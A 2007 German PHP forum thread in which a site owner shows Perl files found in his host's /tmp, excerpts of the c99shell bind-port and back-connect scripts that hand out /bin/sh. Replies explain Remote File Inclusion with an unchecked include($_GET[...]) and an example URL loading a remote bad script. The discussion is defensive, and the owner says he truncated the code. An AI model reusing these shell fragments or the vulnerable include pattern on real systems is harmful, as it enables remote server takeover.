php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Entwicklung > ASP, PERL, CGI, C und alles andere
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


ASP, PERL, CGI, C und alles andere Wolle ma net so sein. Obwohl Perl, ASP, C und TCL zu den minderwertigen Internet-Skriptsprachen zählen, dürfen ab sofort hierzu auch Fragen gestellt werden. ;)

Antwort
 
LinkBack Themen-Optionen Bewertung: Bewertung: 2 Stimmen, 5,00 durchschnittlich.
  #1 (permalink)  
Alt 27-07-2007, 16:28
karltofel
 Newbie
Links : Onlinestatus : karltofel ist offline
Registriert seit: Jul 2007
Beiträge: 12
karltofel ist zur Zeit noch ein unbeschriebenes Blatt
Standard [Perl] Hack versuch mit perl

Hi leute ich bin jetzt schon vor ein paar tagen zu
einem neuen Webhost gewechselt und habe jetzt
meinen Halten durchsucht und alles unwichtige schon mal dort vom
Server gelöscht.

und wie ich so alles durchsuche finde Ich da im /tmp 2 .pl Datein die nicht von mir sind.

Hab mir die Dann herunter geladen um sie mir mal anzusehen:

c99sh_bindport.pl
PHP-Code:
#!/usr/bin/perl
if (@ARGV 1) {exit(1);}
$port $ARGV[0];
exit if 
fork;
....
...
open STDOUT">&X";
open STDERR">&X";
exec("echo \"Welcome to c99shell!\r\n\r\n\"");
while(
1)
{
 
accept(XS);
 
unless(fork)
 {
  
open STDIN"<&X";
  
open STDOUT">&X";
  
close X;
  
exec("/bin/sh");
 }
 
close X;

und c99sh_backconn.pl

PHP-Code:
a#!/usr/bin/perl
use Socket;
$cmd"lynx";
$system'echo "`uname -a`";echo "`id`";/bin/sh';
$
0=$cmd;
......
system($system);
close(STDIN);
close(STDOUT);
close(STDERR); 
kann mir wer sagen was diese Datein machen sollen , bzw wie die da hin gekommen sind, kann ja theoretisch nur durch einen PHP upload passiert sein. Aber keines meine Scripte sollte .pl Datein zulassen und überhaupt die Dateien die es Hochlädt im tmp ordner lassen ... und sonst ist auch nichts von einem Hackversuch zu sehen. (obwohl ich mich aus den Logs von vor 4 Monaten erinnere das versuche statt fanden ( suche nach weitverbreiteten und Fehlerhaften Scripts. aber ohne erfolg))

Find ich irgendwie sehr komisch ....

Edit: Hab jetzt den Code unütz gemacht, damit ihn niemand von hier verwenden kann.

Geändert von karltofel (28-07-2007 um 12:48 Uhr)
Mit Zitat antworten
  #2 (permalink)  
Alt 27-07-2007, 16:35
penizillin
 PHP Guru
Links : Onlinestatus : penizillin ist offline
Registriert seit: Feb 2004
Beiträge: 10.166
penizillin ist zur Zeit noch ein unbeschriebenes Blatt
Standard

http://en.wikipedia.org/wiki/Remote_File_Inclusion
und google nach "c99 shell".
Mit Zitat antworten
  #3 (permalink)  
Alt 27-07-2007, 16:35
jahlives
 Master
Links : Onlinestatus : jahlives ist offline
Registriert seit: Jun 2004
Ort: Hooker in Kernel
Beiträge: 8.279
jahlives ist zur Zeit noch ein unbeschriebenes Blatt
Standard

imho kommen diese Dateien nicht durch eines deiner PHP Upload Scripts hinein. Denn afaik wird PHP eine solche Datei nach Abschluss des Uploads verschieben und wenn du das nicht machst wird sollte PHP die Datei im tmp löschen
Zitat:
The file will be deleted from the temporary directory at the end of the request if it has not been moved away or renamed.
__________________
Gutes Tutorial | PHP Manual | MySql Manual | PHP FAQ | Apache | Suchfunktion für eigene Seiten

"An error does not become truth by reason of multiplied propagation, nor does truth become error because nobody sees it."
Mohandas Karamchand Gandhi (Mahatma Gandhi) (Source)
Mit Zitat antworten
  #4 (permalink)  
Alt 28-07-2007, 12:45
karltofel
 Newbie
Links : Onlinestatus : karltofel ist offline
Registriert seit: Jul 2007
Beiträge: 12
karltofel ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Naja die googlei zu c99 shell hat mir nicht wircklich weiter geholfen,
Hatt mir auch nur gesagt das es dazu verwendet wurde webseiten/server zu hacken, aber da wäre ich ja vermutlich nicht selber drauf gekommen.

Zitat:
imho kommen diese Dateien nicht durch eines deiner PHP Upload Scripts hinein. Denn afaik wird PHP eine solche Datei nach Abschluss des Uploads verschieben und wenn du das nicht machst wird sollte PHP die Datei im tmp löschen
Naja dann ist es mir nur noch rätzelhafter wie die auf den Server gelang sind ...

egal man kann nicht allle rätzel lösen.
Mit Zitat antworten
  #5 (permalink)  
Alt 28-07-2007, 15:26
penizillin
 PHP Guru
Links : Onlinestatus : penizillin ist offline
Registriert seit: Feb 2004
Beiträge: 10.166
penizillin ist zur Zeit noch ein unbeschriebenes Blatt
Standard

rätsel
Mit Zitat antworten
  #6 (permalink)  
Alt 30-07-2007, 09:45
jahlives
 Master
Links : Onlinestatus : jahlives ist offline
Registriert seit: Jun 2004
Ort: Hooker in Kernel
Beiträge: 8.279
jahlives ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Naja dann ist es mir nur noch rätzelhafter wie die auf den Server gelang sind ...
Du wirst wohl irgendwo in deinem Code etwas in der Art
PHP-Code:
include($_POST['value']);
//oder
include($_GET['value']); 
ohne entsprechende Prüfung der Daten machen. Wenn dir also jemand
Code:
http://deineDomain.de/deinScript.php?value=www.badpage.com/badScript.php
dann baust du das in deinen Code ein. Im grossen und ganzen müsste dieses böse Script nur aus einem Formular bestehen, welches die Verarbeitung der Daten mittels eval() macht --> ergo hast du ne PHP Konsole und kannst mit dem Server machen was dir beliebt (Dateien und Verzeichnisse erstellen, Berechtigungen setzen, Dateien nachladen und auf den Server kopieren, den Quelltext deiner Seite ändern ...)

Gruss

tobi


p.s. suche ALLE includes() in deinen Dateien, AUCH in jenen, die du nicht selber geschrieben hast. Schaue wie die Daten gerpüft werden bevor sie auf include() losgelassen werden. Hast du auf dem Server gar register_globals() auf on ?
__________________
Gutes Tutorial | PHP Manual | MySql Manual | PHP FAQ | Apache | Suchfunktion für eigene Seiten

"An error does not become truth by reason of multiplied propagation, nor does truth become error because nobody sees it."
Mohandas Karamchand Gandhi (Mahatma Gandhi) (Source)
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

ADSMAN V3 - Werbe-Manager ansehen ADSMAN V3 - Werbe-Manager

ADSMAN V3 - mehr als nur ein Bannermanager! Banner, Textanzeigen und PagePeel Manager! Mit ADSMAN PRO haben Sie die Marketinglösung für eine effektive und effiziente Werbeschaltung mit messbaren Ergebnissen. Unterstützt werden Bannerformate in beliebi

25.10.2018 virtualsystem | Kategorie: PHP/ Bannerverwaltung
PHP News und Artikel Script V2

News schreiben, verwalten, veröffentlichen. Dies ist jetzt mit dem neuen PHP News & Artikel System von virtualsystem.de noch einfacher. Die integrierte Multi-User-Funktion und der WYSIWYG-Editor (MS-Office ähnliche Bedienung) ermöglichen...

25.10.2018 virtualsystem | Kategorie: PHP/ News
Top-Side Guestbook

Gästebuch auf Textbasis (kein MySQL nötig) mit Smilies, Ip Sperre (Zeit selbst einstellbar), Spamschutz, Captcha (Code-Eingabe), BB-Code, Hitcounter, Löschfunktion, Editierfunktion, Kommentarfunktion, Kürzung langer Wörter, Seiten- bzw. Blätterfunktion, V

22.10.2018 webmaster10 | Kategorie: PHP/ Gaestebuch
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 06:42 Uhr.